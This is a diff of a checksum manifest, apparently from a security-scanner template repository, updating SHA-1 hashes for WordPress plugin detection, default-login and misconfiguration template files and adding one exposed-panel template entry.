helpers/wordpress/plugins/popup-maker.txt:c25ed33c251bfc15583cad11462f17a56e46989d -helpers/wordpress/plugins/post-smtp.txt:e3ed60a025d245a507278b5f3586e23e4ead67eb +helpers/wordpress/plugins/post-smtp.txt:aecdd619817528f6e7764e982d8df1aafa8a7175 helpers/wordpress/plugins/post-types-order.txt:f243f3446bb1226eacba3cdb8b904ef729d6ec9d helpers/wordpress/plugins/premium-addons-for-elementor.txt:e84ad28997bf6ae8ece163b8b89ecd5f073ccae6 helpers/wordpress/plugins/pretty-link.txt:e45ae12a7326100f6ce5fbc5ad2c1260c5d71d13 @@ -917,7 +917,7 @@ helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt:5b7155 helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:c8b9858b5f22b090d294062ac1a62f64a7de4d69 helpers/wordpress/plugins/woocommerce-legacy-rest-api.txt:6288dca36116a23967560d315aa079e9c4f5da8c helpers/wordpress/plugins/woocommerce-payments.txt:373a109947826f162ef5dba14dc054105c72c5ca -helpers/wordpress/plugins/woocommerce-paypal-payments.txt:0aaa3cea7451675ff270540e13308210d8fce9ab +helpers/wordpress/plugins/woocommerce-paypal-payments.txt:036622d5a32b0e5099f20d8cff7515dc042253aa helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:a16cd18f1019f04b207109b189b504edbde41ab2 helpers/wordpress/plugins/woocommerce-services.txt:b6ed966424606782d1fc2f9032f0fb0e4d237bd7 helpers/wordpress/plugins/woocommerce.txt:ef9896bae39c1e3999a9f105466cc1f7814021a7 @@ -948,7 +948,7 @@ helpers/wordpress/plugins/wpcf7-recaptcha.txt:c3000a6db3b2781a189fbfaa91a73e6d63 helpers/wordpress/plugins/wpcf7-redirect.txt:e533a0ddf49ac25eb565f7786d75249e411bd53a helpers/wordpress/plugins/wpforms-lite.txt:65b63da7547962e59c98dcf1e2db069084362d55 helpers/wordpress/plugins/wps-hide-login.txt:51a2a1f09e1587e93a965d8ae52c2309477eba45 -helpers/wordpress/plugins/wpvivid-backuprestore.txt:59d7e64657a8b97484f080d8c51a6652e22d2a14 +helpers/wordpress/plugins/wpvivid-backuprestore.txt:42932d0fb47c40d001ff73872d5fff049a1361b5 helpers/wordpress/plugins/yith-woocommerce-compare.txt:fc4929308af8b80845b3c743a30013a669a02875 helpers/wordpress/plugins/yith-woocommerce-wishlist.txt:bac19d8941e404675dba7142fecdc9ea1f371ad9 http/cnvd/2017/CNVD-2017-03561.yaml:79260d0e646db6519b46802fac2d8ec8589d1ba2 @@ -3520,7 +3520,7 @@ http/default-logins/dell/dell-dpi-default-login.yaml:c8dabcfcdb39d6a22dd877512d2 http/default-logins/dell/dell-idrac-default-login.yaml:1dc3a2376aeb7ca1b68b49de2fb293c5d3f988d5 http/default-logins/dell/dell-idrac9-default-login.yaml:ff8233327b0de4c8fad6255f51c14ec0771fb8de http/default-logins/dell/emcecom-default-login.yaml:67e9a911b490370e01545f18a1ed6adbb5333fb8 -http/default-logins/dialogic/dialogic-xms-default-login.yaml:2d776bba7a7f5510dd6a8e29ff325a9d3be3db18 +http/default-logins/dialogic/dialogic-xms-default-login.yaml:4f64a4ef93735304917e46ae85e4689a3fde7c5b http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml:757e37421ad654500aeb166c26016e839e77f176 http/default-logins/digitalrebar/digitalrebar-default-login.yaml:87a2a0df776e6ceab4b3a02845b43bf93f6d3ada http/default-logins/druid/druid-default-login.yaml:cdf960a64c7f527a149b2a1b5cf62b7d40c4aeee @@ -3963,6 +3963,7 @@ http/exposed-panels/emessage-panel.yaml:0f52f7a8f6b5a3b897f9dcee5102c76fdf44c05f http/exposed-panels/emqx-panel.yaml:7dc0f672d8eb1afd33f03d9259c806e59400fd89 http/exposed-panels/ems-login-panel.yaml:7425e45058fd144c1b7d4b96aa398a7ce2adf54f http/exposed-panels/ems-webclient-panel.yaml:22100541a984199b437cc22a3c9ea0647efdd224 +http/exposed-panels/endpoint-protector-panel.yaml:ba4ae20faf620f47cef6250249075190fadacf61 http/exposed-panels/entrust-identityguard.yaml:1f4f1d52172e9b6450b8a1fceb92c738ea82a3bc http/exposed-panels/eos-http-browser.yaml:dcc754f052324696c7fb1d6af12d94dbe6faa072 http/exposed-panels/episerver-panel.yaml:2d2a42e674cfc5eaabb9e0044859e70856578be2 @@ -5869,7 +5870,7 @@ http/misconfiguration/secnet-info-leak.yaml:5f2028c717a06972b7c79f8651397eed3cbd http/misconfiguration/seeyon-unauth.yaml:327e4ce46015f481855c8a2f2f6d26b80a2f9109 http/misconfiguration/selenium-exposure.yaml:1fb605206740b5a7ec01d6ba7468b4339d8f34e9 http/misconfiguration/sentinel-license-monitor.yaml:123e83ea787470cc96323f371c0f43ec4db9ec22 -http/misconfiguration/seq-dashboard-unath.yaml:b3621cee00d9c3cd50ccb6173b4c2b6a9f367c12 +http/misconfiguration/seq-dashboard-unath.yaml:c8f87c43bbc194440decf9a5a58444279b11fb5d http/misconfiguration/server-status.yaml:0fbfb6c7b6e541aade005e601c0a5d83acdfe202 http/misconfiguration/service-pwd.yaml:625117d7929ae17d0cf02bb5b4e9fefee1ca36b9 http/misconfiguration/servicenow-widget-misconfig.yaml:7946ba306bf6bdea013874dd95b68cab9c106c7b @@ -7234,228 +7235,228 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:ec57f3b465eaf57bf1b8f8f35fe882772f3915c6 -http/technologies/wordpress/plugins/add-to-any.yaml:329bec71d9dcebe0121501e719996fa143b23af8 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8167f5def9edba31b701df1c8d337f98f99091 +http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 +http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:4a54b8480fb24b13e3489c8d94a5d510a200e290 -http/technologies/wordpress/plugins/akismet.yaml:4f5ef22d9ff0fb0e0447a26d52892d2c0247f780 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d +http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:206d6a3f7cc7e29ff664dec6938950941d260c83 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:282c0e5d1264858850e9544a769e53b49b75a93b -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:9bf2340920d4f739367f72ef92deb55a0ea1fca0 -http/technologies/wordpress/plugins/amp.yaml:08164d4e6bc119955f893a06957ccbfbf87ffd96 -http/technologies/wordpress/plugins/antispam-bee.yaml:8869676746533a0b26d4a8ebe90232db970ec8a8 -http/technologies/wordpress/plugins/astra-sites.yaml:215f3a8246769e2c0eacdfc3456d65c07e2dbf7e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 +http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 +http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c +http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:c12e4bdcd707a36a36f8ec746640368a9ab9b8a6 -http/technologies/wordpress/plugins/backwpup.yaml:d3078e65347c8e7ba29c07a31d19e59d919b17e2 -http/technologies/wordpress/plugins/better-search-replace.yaml:fcb1bd8c34d888cbdd8c91b9bd376f7f2c5e1db4 -http/technologies/wordpress/plugins/better-wp-security.yaml:d70b7fd8629f55e96e81e383a1c03fdbe4d6053f -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:b3cf765ed477c5f35e87648e635a5a9e8e0f0c87 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:be29dc53d64b851be2dd27f430b43b50c91e8745 -http/technologies/wordpress/plugins/breeze.yaml:53f12e4ba3166fa40bad9e83c7e98c4e378ffe53 -http/technologies/wordpress/plugins/broken-link-checker.yaml:17b579f1d9b97813bc463c0934164a57405e88dc -http/technologies/wordpress/plugins/chaty.yaml:3cd699342ea81065c8df588a9d4918cc4c184ca1 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:78dd6492e8224ddba8ab74d5d89000079d6f0dbe -http/technologies/wordpress/plugins/classic-editor.yaml:ff8e86f3e08fb682ca332a875cba87ea33b16ad8 -http/technologies/wordpress/plugins/classic-widgets.yaml:50be32e1e31fa49001896f82e7007380922df385 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9b413c0461850aa189ca242f0dc54a1b313f27b7 +http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 +http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 +http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 +http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 +http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 +http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba +http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff +http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d +http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 +http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:bb71c405f1df734efc16b74c913a9e195f533cbd -http/technologies/wordpress/plugins/coblocks.yaml:0c5347f10d4288c19197e05ff5f530034a29c7aa -http/technologies/wordpress/plugins/code-snippets.yaml:9cfd456ebb4dd37aa2e217b5b729610dc9de8aba -http/technologies/wordpress/plugins/coming-soon.yaml:05eeabbe04ce9aa9d59d8be13c6151b5826fe040 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:720fb2b50cfafb9f21e255d0c7db581911397faa -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:466cc8d66d301b44b014ab0d8ea5e9a8c057a89d -http/technologies/wordpress/plugins/contact-form-7.yaml:3f8f75e0c90b7cce53379406d92c4d79f9f165a8 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:0cca60e50935715c2f39c99c3b60943e85d04108 -http/technologies/wordpress/plugins/cookie-law-info.yaml:82a0f0cec280ec697e763542a5cb44ef087b00c7 -http/technologies/wordpress/plugins/cookie-notice.yaml:0e49e037c257e7c01de6799cb4059697d49239d9 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:ec5c7817f48f26b5b60819e75532243f1208e95f -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:6d0d97a5ad97cc2e1e79a2fb883059d6d329096d -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:0adb765bc8f36ec5f68dd7b19aff7af39710d997 -http/technologies/wordpress/plugins/custom-css-js.yaml:0659d90c2cdafb282f02a4ffa9d03d768baeea00 -http/technologies/wordpress/plugins/custom-fonts.yaml:20d60ce9eab68ddbf92667f87bdaa4e0aa6a9b0c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:3ee725e006355b3fbe186de92110590bae612345 -http/technologies/wordpress/plugins/disable-comments.yaml:4381da961dfc67495cbc8735ec9c3635a18fe108 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:06edc3fac222121e56dd1aa81107fa445d2881e8 -http/technologies/wordpress/plugins/duplicate-page.yaml:c052e3d27ce5259661773697e7b2daf06e2f82d7 -http/technologies/wordpress/plugins/duplicate-post.yaml:142d0e2cceb74a6be4ec5b728c3f10d0b4e63f31 -http/technologies/wordpress/plugins/duplicator.yaml:2732b8557bdf1d43659131872f85cf5ca99f5bb0 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:7060c7293a8b4702d1b2a9c656b5d4389f217209 +http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 +http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d +http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c +http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d +http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 +http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 +http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 +http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c +http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 +http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c +http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 +http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 +http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e +http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:79da3abf79691e69c312d229f1e44610ea526ecb -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:1e574c515da165fc59b51a3711e45a78a67e6b60 -http/technologies/wordpress/plugins/elementor.yaml:0866f40b5bd9706edfbdb39403bc48b5129ce992 -http/technologies/wordpress/plugins/elementskit-lite.yaml:dd05c36475b2ebdc2c221ce1ca9f9b5fec2bac3c -http/technologies/wordpress/plugins/enable-media-replace.yaml:168d9903ed6ac6399124de37c2469516373329bc -http/technologies/wordpress/plugins/envato-elements.yaml:3e032596c54605054548de6bac94bbca2af8e276 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:d0bff87d01423ecb7197316459aee818e7df9c8e -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:09194cda1862ae6ecec40871eee68acf4f30b307 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:07344505879659d191a5a8d9246330c77919f954 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:e1bc8264273362a07f5646110b69723fb8baa1e8 -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:ec6c534e10e7851218bc9c4fa7962f5dd634a4c6 -http/technologies/wordpress/plugins/flamingo.yaml:6b98a30cc0c0dff34887f656956a84d603370b8f -http/technologies/wordpress/plugins/fluentform.yaml:16b5f829881769195c424e9cec5a41cf3f936b35 -http/technologies/wordpress/plugins/font-awesome.yaml:06334739e493bcd2fd6f2b75a12d14b0dffa91c4 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:0cec3e7efb5754bfdf2617aa9c8471001e7ea7f1 -http/technologies/wordpress/plugins/formidable.yaml:c867773fc026204cd6d224681f2664ba95eccae8 -http/technologies/wordpress/plugins/forminator.yaml:68922a01d81cb5077ab9ca3af1446bdba22a5aea -http/technologies/wordpress/plugins/ga-google-analytics.yaml:a46c993ce87f9d3db7938aa116f57ba7933aa335 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:66184747fe24c93814c66879fbac990ba5f979f0 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:758d398bb9c813870cc0aed27a86a35025364571 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:a40f701bf3bebff907c1e72547cc1054b98c4166 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:1d7fe91e8109a97f9645290fa2ee843966a65526 -http/technologies/wordpress/plugins/google-site-kit.yaml:e778e1f50e8f32324fc7c43f26eba21b0f1ab9a9 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:90e2c129b35d06a76add63006a81d85889dd59c4 -http/technologies/wordpress/plugins/gtranslate.yaml:b7092076872b4b9b52f9ab20faa1113cbecef5ec -http/technologies/wordpress/plugins/gutenberg.yaml:c2b8aa3043463d793dec0ea24d8f971f2e3fcd5e -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:06b38ec1e32d963934324af6e72d3942706116fa +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 +http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 +http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 +http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d +http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc +http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 +http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 +http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 +http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e +http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 +http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa +http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 +http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 +http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:41540e5633d9ece535429d42fe77c3d9d3cf2af7 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:6bb08310fb9c45d010568d9fb5c40f16e1ea6e01 -http/technologies/wordpress/plugins/header-footer.yaml:df58fa0ee00ce86b74f609da7b04f171b7b83f0e -http/technologies/wordpress/plugins/health-check.yaml:e473a976acf19a5bc60c15d1a4ed77c800624967 -http/technologies/wordpress/plugins/hello-dolly.yaml:2d4ffe7544bafbae05a8ae7d2f78599622bf3e25 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:3584807740bacd56b3d1baeb0c2d90675a401695 -http/technologies/wordpress/plugins/hostinger.yaml:da5322d0cd807bd1cf60a70f2fc9121c33dcc633 -http/technologies/wordpress/plugins/image-optimization.yaml:1a7fa589596b514939cf5faf298b104a217e4a4e -http/technologies/wordpress/plugins/imagify.yaml:78d9cb7f04dca45f87214757078f74e2bb600d85 -http/technologies/wordpress/plugins/imsanity.yaml:aae38d08ce345546da3baf393fd6a4c3df17d62f -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:1edc7d2d6a1aa1189096029fc65f5c73f2fc4deb -http/technologies/wordpress/plugins/instagram-feed.yaml:c8eed75011e5c3cc9190f6f076e54133597d1c9e -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:55b271c5ec27c955cf0df99dfb210816ce3b8603 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d +http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf +http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 +http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 +http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 +http/technologies/wordpress/plugins/image-optimization.yaml:12b0b8d10e65946e41142eb6a461eb801e925582 +http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff +http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 +http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:343a881aab1fc4f96a58ae9ac8ac7669c6c3f157 -http/technologies/wordpress/plugins/jetpack.yaml:38a1131faa5dfd9a2f1df6206521f68c508d1799 -http/technologies/wordpress/plugins/kadence-blocks.yaml:f7d0593093adefae9b3b44ff537638f81aa3e192 -http/technologies/wordpress/plugins/kirki.yaml:62e2672da4082a1f6630c9c9b251c8716f19d3ee -http/technologies/wordpress/plugins/leadin.yaml:42ed9c2b8893fdeaba5f6fd5e6193049914b7ae4 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:89832ab3048e4308522c2c05f958d9e4358a8ce9 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:e377dd009578d49f2dd9db664d3b941953cadc7d -http/technologies/wordpress/plugins/litespeed-cache.yaml:941869561dd9b23d8eca198586c6b9520d6b4807 -http/technologies/wordpress/plugins/loco-translate.yaml:e6852e42d111db5d89a8336c3e044b1a1da1a6e5 -http/technologies/wordpress/plugins/loginizer.yaml:47dc93f79d4c285926fccf322f79f8c344aae4ad +http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f +http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 +http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a +http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc +http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c +http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 +http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 +http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:21da7dc7d523277caa4ad51a6888ef455be44b6f -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:f3cfc1fdaeed773515d7810361c439c1455505ce -http/technologies/wordpress/plugins/mailpoet.yaml:27375a604db16357ab56428709ae4c86704acb2e -http/technologies/wordpress/plugins/maintenance.yaml:86b82f3210788c1a0aefe1390b418267f1f946df -http/technologies/wordpress/plugins/mainwp-child.yaml:1a7193e017c343b03505983253ed46dcc09986b1 -http/technologies/wordpress/plugins/malcare-security.yaml:48c2a087b23fb5193379c8b908e1b2722e8f04ae -http/technologies/wordpress/plugins/megamenu.yaml:d6004d391e1f13ed3e6aac8545bdda4fe11f3730 -http/technologies/wordpress/plugins/members.yaml:cd2dca7ac3fabfa07407d03ed59531e0f2f836cd -http/technologies/wordpress/plugins/meta-box.yaml:4e36574230059a97a08c2fbf7af4c0f0c3c8b1c1 -http/technologies/wordpress/plugins/metform.yaml:36f00af1a0b880d2ae8da0eb720e9b83449604eb -http/technologies/wordpress/plugins/ml-slider.yaml:8c1fba585ea03d37b089133975ba5c13576d1893 -http/technologies/wordpress/plugins/newsletter.yaml:1811f3b4b120817bcd491d5195c2a113ae0fec96 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:5bddd252a96fd63e4c5300f6c6bf472ddd239cc7 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:a64f8be34659faf40e120976cdb1567d1948cbee -http/technologies/wordpress/plugins/ninja-forms.yaml:a99ba327aaf1552426cb1d049616567d9ebacf10 -http/technologies/wordpress/plugins/ocean-extra.yaml:991e59c8bc2f4059604e24ba6cef5452162d6083 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:40df5673350cffc6d8a576caedd7966a25db7732 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:eb1fc33dae652d6d2033cf1fea8436e870e9a40b -http/technologies/wordpress/plugins/optinmonster.yaml:4b87b01edfe67e44a7de2ee98189d390ba734c9c -http/technologies/wordpress/plugins/otter-blocks.yaml:4de7112df9dc693ad25f827a22ed619193ef4102 